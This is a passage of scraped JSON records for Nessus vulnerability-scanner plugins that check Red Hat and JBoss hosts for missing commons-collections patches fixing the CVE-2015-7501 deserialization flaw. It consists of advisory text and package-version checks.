audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2671\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-debuginfo-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:27", "description": "Updated packages that fix one security issue for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 6.3 are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat Enterprise Linux 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2536)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2015-2536.NASL", "href": "https://www.tenable.com/plugins/nessus/87191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2536. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87191);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2536\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2015:2536)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages that fix one security issue for the Apache\ncommons-collections library for Red Hat JBoss Enterprise Application\nPlatform 6.3 are now available for Red Hat Enterprise Linux 5, 6, and\n7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections-eap6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2536\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections-eap6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:27", "description": "Updated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-03T00:00:00", "type": "nessus", "title": "RHEL 7 : apache-commons-collections (RHSA-2015:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework-javadoc", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2522. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87179);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"RHEL 7 : apache-commons-collections (RHSA-2015:2522)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2522\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2522\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:27", "description": "Updated packages for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 5.2, which fix one security issue, are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 5 is a platform for Java applications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red Hat Enterprise Linux 4, 5, and 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : JBoss EAP (RHSA-2015:2535)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-2535.NASL", "href": "https://www.tenable.com/plugins/nessus/87190", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2535. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87190);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2535\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss EAP (RHSA-2015:2535)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for the Apache commons-collections library for Red\nHat JBoss Enterprise Application Platform 5.2, which fix one security\nissue, are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 5 is a platform for Java\napplications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red\nHat Enterprise Linux 4, 5, and 6 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected jakarta-commons-collections and / or\njakarta-commons-collections-tomcat5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2535\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"jakarta-commons-collections-3.2.1-5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-5.ep5.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-3.2.1-5.ep5.el6\")) flag++;\n if 